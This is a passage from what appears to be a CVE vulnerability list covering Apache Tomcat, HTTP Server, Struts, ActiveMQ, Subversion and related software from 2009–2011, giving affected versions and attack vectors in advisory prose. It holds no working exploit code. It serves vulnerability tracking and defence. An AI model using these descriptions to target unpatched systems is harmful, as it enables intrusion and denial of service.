13932| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
13933| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
13934| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
13935| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
13936| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
13937| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
13938| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
13939| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
13940| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
13941| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13942| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13943| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
13944| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
13945| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
13946| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
13947| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
13948| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
13949| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
13950| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
13951| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
13952| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
13953| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
13954| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
13955| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
13956| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
13957| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
13958| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
13959| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
13960| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
13961| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
13962| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
13963| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
13964| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
13965| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
13966| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
13967| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
13968| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
13969| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
13970| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
13971| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
13972| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
13973| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
13974| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
13975| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
13976| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
13977| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
13978| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
13979| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
13980| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13981| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
13982| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
13983| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
13984| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
13985| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
13986| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
13987| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
13988| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
13989| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
13990| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
13991| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
13992| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
13993| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
13994| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
13995| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
13996| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13997| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
13998| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
13999| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
14000| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
14001| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
14002| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
14003| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
14004| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
14005| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
14006| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
14007| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
14008| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
14009| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
14010| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
14011| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
14012| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
14013| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
14014| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
14015| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
14016| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
14017| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
14018| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
14019| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
14020| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
14021| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
14022| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
14023| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
14024| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
14025| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
14026| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
14027| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
14028| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
14029| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
14030| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
14031| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
14032| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
14033| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
14034| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
14035| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
14036| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
14037| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
